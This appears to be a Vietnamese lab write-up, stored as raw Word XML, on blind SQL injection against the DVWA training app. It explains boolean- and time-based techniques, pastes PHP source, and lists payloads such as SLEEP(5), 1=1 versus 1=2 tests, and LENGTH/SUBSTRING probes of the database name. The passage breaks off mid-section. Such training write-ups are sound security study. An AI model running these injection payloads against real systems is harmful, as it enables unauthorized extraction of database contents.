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2352" w14:textId="649BB121" w:rsidR="00D94D2C" w:rsidRPr="00B702EC" w:rsidRDefault="008F2994" w:rsidP="00663889">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F2994">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00274892">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="008F2994">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00DE325F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind </w:t>
      </w:r>
      <w:r w:rsidR="00E03DBE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0748D172" w14:textId="02DDD304" w:rsidR="00516F64" w:rsidRPr="008F2994" w:rsidRDefault="00516F64" w:rsidP="0066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0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8F2994">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Mô tả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE46120" w14:textId="77777777" w:rsidR="007B57C7" w:rsidRDefault="007B57C7" w:rsidP="007B57C7">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B57C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL Injection </w:t>
      </w:r>
      <w:r w:rsidRPr="007B57C7">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>là dạng SQL Injection mà ứng dụng không hiển thị trực tiếp kết quả truy vấn hoặc lỗi SQL ra màn hình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613B119F" w14:textId="77777777" w:rsidR="007B57C7" w:rsidRPr="007B57C7" w:rsidRDefault="007B57C7" w:rsidP="007B57C7"/>
    <w:p w14:paraId="536ED0B5" w14:textId="77777777" w:rsidR="007B57C7" w:rsidRPr="007B57C7" w:rsidRDefault="007B57C7" w:rsidP="007B57C7">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B57C7">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Kẻ tấn công phải suy luận dữ liệu thông qua phản hồi gián tiếp của hệ thống, thường dựa trên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D497F8D" w14:textId="77777777" w:rsidR="007B57C7" w:rsidRPr="007B57C7" w:rsidRDefault="007B57C7" w:rsidP="007B57C7">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B57C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean-based: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B57C7">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">quan sát sự khác biệt giữa điều kiện đúng và sai. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AF2F38" w14:textId="77777777" w:rsidR="007B57C7" w:rsidRDefault="007B57C7" w:rsidP="007B57C7">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B57C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Time-based: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B57C7">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">quan sát thời gian phản hồi của server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5C51BA" w14:textId="77777777" w:rsidR="007B57C7" w:rsidRPr="007B57C7" w:rsidRDefault="007B57C7" w:rsidP="007B57C7"/>
    <w:p w14:paraId="46B35FDE" w14:textId="77777777" w:rsidR="007B57C7" w:rsidRDefault="007B57C7" w:rsidP="007B57C7">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B57C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hậu quả: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B57C7">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vẫn có thể dẫn đến rò rỉ dữ liệu, bypass xác thực hoặc truy xuất thông tin nhạy cảm, dù ứng dụng không hiển thị lỗi SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDA9C04" w14:textId="77777777" w:rsidR="007B57C7" w:rsidRPr="007B57C7" w:rsidRDefault="007B57C7" w:rsidP="007B57C7"/>
    <w:p w14:paraId="6A71B065" w14:textId="77777777" w:rsidR="007B57C7" w:rsidRPr="007B57C7" w:rsidRDefault="007B57C7" w:rsidP="007B57C7">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B57C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Nguyên nhân chính: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B57C7">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dữ liệu người dùng vẫn được đưa vào câu truy vấn SQL không an toàn, nhưng kết quả truy vấn bị ẩn khỏi giao diện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9D71CF" w14:textId="0B3F0661" w:rsidR="00274892" w:rsidRPr="00274892" w:rsidRDefault="00274892" w:rsidP="00274892">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00274892">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A54636" w14:textId="5FC0090B" w:rsidR="00B702EC" w:rsidRDefault="00B702EC" w:rsidP="00B702EC">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64BBF168" w14:textId="1001246D" w:rsidR="00AB0E9D" w:rsidRDefault="002B2670" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B2670">
        <w:t>I.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD3200" w:rsidRPr="00211B64">
        <w:t>Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424FC8B0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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C236A5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if( isset( $_GET[ 'Submit' ] ) ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B31FFC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Check Anti-CSRF token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DEEFF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checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA8ECD0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$exists = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB8697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Get input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB30B5E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$id = $_GET[ 'id' ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A399C51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Was a number entered?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2EA597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if(is_numeric( $id )) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B938DB6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$id = intval ($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B062B3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switch ($_DVWA['SQLI_DB']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C72FF1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case MYSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F86EBE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// Check the database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761484A2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 = $db-&gt;prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C312FF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$data-&gt;bindParam( ':id', $id, PDO::PARAM_INT );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5609ECF9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$data-&gt;execute();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F85EC1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$data-&gt;rowCount();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A57F4B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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B54122F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case SQLITE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534A58A9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global $sqlite_db_connection;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120D8B1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$stmt = $sqlite_db_connection-&gt;prepare('SELECT COUNT(first_name) AS numrows FROM users WHERE user_id = :id LIMIT 1;' );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9D29F3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$stmt-&gt;bindValue(':id',$id,SQLITE3_INTEGER);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245F2526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 = $stmt-&gt;execute();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7120DC6C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$result-&gt;finalize();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B50F3A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if ($result !== false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0115DE72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There is no way to get the number of rows returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F035BA2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This checks the number of columns (not rows) just</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDF33BC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as a precaution, but it won't stop someone dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D0AF7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multiple rows and viewing them one at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E7CE3C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62DF8626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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    $num_columns = $result-&gt;numColumns();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342A3C0B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if ($num_columns == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534E3C79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$row = $result-&gt;fetchArray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B72DCEC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00924A51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$numrows = $row[ 'numrows' ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0739AD37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$exists = ($numrows == 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB6DBC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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6419C9CD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5FACAA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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6FE4E1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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2526F9F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0732466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Get results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC3BB14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 ($exists) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ECCA0E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0810421F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exists in the database.&lt;/pre&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C55A3A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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18236167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User wasn't found, so the page wasn't!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205C697D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header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14479550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1937DAAF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0ECD1D08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is MISSING from the database.&lt;/pre&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDF6AE2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2F145C09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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A77EC17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// Generate Anti-CSRF token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A90559" w14:textId="77777777" w:rsid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generateSessionToken();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E47CA9" w14:textId="1B732E4A" w:rsidR="002B2670" w:rsidRPr="002B2670" w:rsidRDefault="002B2670" w:rsidP="002B26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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323201F5" w14:textId="77777777" w:rsidR="002B2670" w:rsidRDefault="002B2670" w:rsidP="002B2670"/>
    <w:p w14:paraId="3CE55191" w14:textId="713E8D2F" w:rsidR="002B2670" w:rsidRPr="002B2670" w:rsidRDefault="002B2670" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Ở đây trang web cho phép nhập số ID người dùng vào ô input và Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3133A2" w14:textId="199E9D40" w:rsidR="002B2670" w:rsidRDefault="002B2670" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="750354EC" wp14:editId="37C7612A">
            <wp:extent cx="5943600" cy="3442970"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="12090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3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50FD" w14:textId="47354B42" w:rsidR="002B2670" w:rsidRDefault="002B2670" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả trả về là User ID tồn tại trên database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3123A6" w14:textId="77777777" w:rsidR="00A83A41" w:rsidRDefault="00A83A41" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CA5676E" w14:textId="77777777" w:rsidR="00A83A41" w:rsidRDefault="00A83A41" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="530A16C6" w14:textId="3B590FC5" w:rsidR="00A83A41" w:rsidRDefault="00A83A41" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Với Blind SQL, khi tôi thử test bằng id=1’ như SQLi bình thường, nó không trả về kết quả trên giao diện</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A4259B" w14:textId="59C600F0" w:rsidR="00A83A41" w:rsidRDefault="00A83A41" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00A83A41">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C1ED201" wp14:editId="0E580246">
            <wp:extent cx="5943600" cy="2732405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9577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6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2688" w14:textId="44CA86D8" w:rsidR="00A83A41" w:rsidRDefault="00A83A41" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Mà kết quả chỉ hiển thị “</w:t>
      </w:r>
      <w:r w:rsidRPr="00A83A41">
        <w:t>User ID is MISSING from the database.</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F7E8AA" w14:textId="77777777" w:rsidR="00A83A41" w:rsidRDefault="00A83A41" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FA31F04" w14:textId="38D7A8FD" w:rsidR="00A83A41" w:rsidRDefault="00A83A41" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Trong source code, database xử lí theo truy vấn sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1204A8A4" w14:textId="26C6B1E3" w:rsidR="00A83A41" w:rsidRDefault="00A83A41" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>$data = $db-&gt;prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4443FC" w14:textId="77777777" w:rsidR="00A83A41" w:rsidRDefault="00A83A41" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31596DBB" w14:textId="27513FEA" w:rsidR="00A83A41" w:rsidRDefault="00A83A41" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00A83A41">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="730DC647" wp14:editId="336F9AB8">
            <wp:extent cx="3214688" cy="3077528"/>
            <wp:effectExtent l="0" t="0" r="5080" b="8890"/>
            <wp:docPr id="15333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446" cy="30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1F8" w14:textId="3B3F29DE" w:rsidR="00A83A41" w:rsidRDefault="00A83A41" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Tôi bắt đầu thử với Payload id=1’ AND SLEEP(1)# &gt; Kết quả trả đúng 1s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7BB7BE" w14:textId="4EEBEEB4" w:rsidR="00A83A41" w:rsidRDefault="00A83A41" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00A83A41">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C3156CB" wp14:editId="634B2367">
            <wp:extent cx="3764280" cy="3613104"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6985"/>
            <wp:docPr id="11776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4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827" cy="36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CB6F" w14:textId="3BD4A10B" w:rsidR="00A83A41" w:rsidRDefault="00A83A41" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Và đúng kết quả khi tôi cho SLEEP(5) và server đã ngủ đúng 5s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8A8A5F" w14:textId="77777777" w:rsidR="00A83A41" w:rsidRDefault="00A83A41" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7498529B" w14:textId="39427B3C" w:rsidR="001F69A1" w:rsidRDefault="001F69A1" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>2. Booleen-based Blind SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C622B04" w14:textId="77777777" w:rsidR="001F69A1" w:rsidRDefault="001F69A1" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BB9358A" w14:textId="59964F8D" w:rsidR="001F69A1" w:rsidRDefault="001F69A1" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Tôi thử với payload id=</w:t>
      </w:r>
      <w:r w:rsidRPr="001F69A1">
        <w:t>1' AND 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CACE6EF" w14:textId="3C0F1E4A" w:rsidR="001F69A1" w:rsidRDefault="001F69A1" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571A3469" w14:textId="6709467F" w:rsidR="00A83A41" w:rsidRDefault="001F69A1" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="001F69A1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69E26B3F" wp14:editId="5DEEB965">
            <wp:extent cx="5943600" cy="3017520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17132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1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BB68" w14:textId="23AE08CB" w:rsidR="001F69A1" w:rsidRDefault="001F69A1" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kết quả trả về </w:t>
      </w:r>
      <w:r w:rsidRPr="001F69A1">
        <w:t>User ID exists in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD4414B" w14:textId="77777777" w:rsidR="001F69A1" w:rsidRDefault="001F69A1" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE23B17" w14:textId="666BBEA4" w:rsidR="001F69A1" w:rsidRDefault="001F69A1" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Để xác nhận điều này không phải là may mắn tôi tiếp tục với id=</w:t>
      </w:r>
      <w:r w:rsidRPr="001F69A1">
        <w:t>1' AND 1=</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="001F69A1">
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ED2F76" w14:textId="1B7A666E" w:rsidR="001F69A1" w:rsidRDefault="001F69A1" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="001F69A1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41B8471A" wp14:editId="2FB2CCA0">
            <wp:extent cx="5943600" cy="2833370"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="8051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725E" w14:textId="357F68D3" w:rsidR="00A83A41" w:rsidRDefault="001F69A1" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả trả về là MISSING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA04230" w14:textId="77777777" w:rsidR="001F69A1" w:rsidRDefault="001F69A1" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="324FBD3A" w14:textId="4F3A0033" w:rsidR="001F69A1" w:rsidRDefault="001F69A1" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Tiếp tục thử với tìm độ dài của database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE836F2" w14:textId="4D1824FC" w:rsidR="001F69A1" w:rsidRDefault="001F69A1" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>id=</w:t>
      </w:r>
      <w:r w:rsidRPr="001F69A1">
        <w:t>1' AND LENGTH(DATABASE())=</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001F69A1">
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7925C0BF" w14:textId="288CA8E9" w:rsidR="00A83A41" w:rsidRDefault="001F69A1" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="001F69A1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3738B1BC" wp14:editId="34C90634">
            <wp:extent cx="5943600" cy="2837180"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="17133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8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1207" w14:textId="706C8ED4" w:rsidR="001F69A1" w:rsidRDefault="001F69A1" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Tuy nhiên kết quả lại trả về là MISSING kèm 404 NOT FOUND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F13A781" w14:textId="4180A105" w:rsidR="001F69A1" w:rsidRDefault="001F69A1" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="001F69A1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EAE1A40" wp14:editId="1365E47E">
            <wp:extent cx="5943600" cy="2827655"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5974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7E76" w14:textId="48145CFC" w:rsidR="001F69A1" w:rsidRDefault="001F69A1" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả trả về là thành công (có tồn tại) khi tôi thử đến length = 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A522F02" w14:textId="77777777" w:rsidR="001F69A1" w:rsidRDefault="001F69A1" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11616234" w14:textId="79E73DB3" w:rsidR="008A04C2" w:rsidRDefault="008A04C2" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Tiếp theo tôi thử tìm thử tên database với chữ cái vị trí đầu tiên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5063989D" w14:textId="2B799647" w:rsidR="008A04C2" w:rsidRDefault="008A04C2" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Id= </w:t>
      </w:r>
      <w:r w:rsidRPr="008A04C2">
        <w:t>1' AND SUBSTRING(DATABASE(),1,1)='d'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49740444" w14:textId="65C89535" w:rsidR="008A04C2" w:rsidRDefault="008A04C2" w:rsidP="002B2670">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="008A04C2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
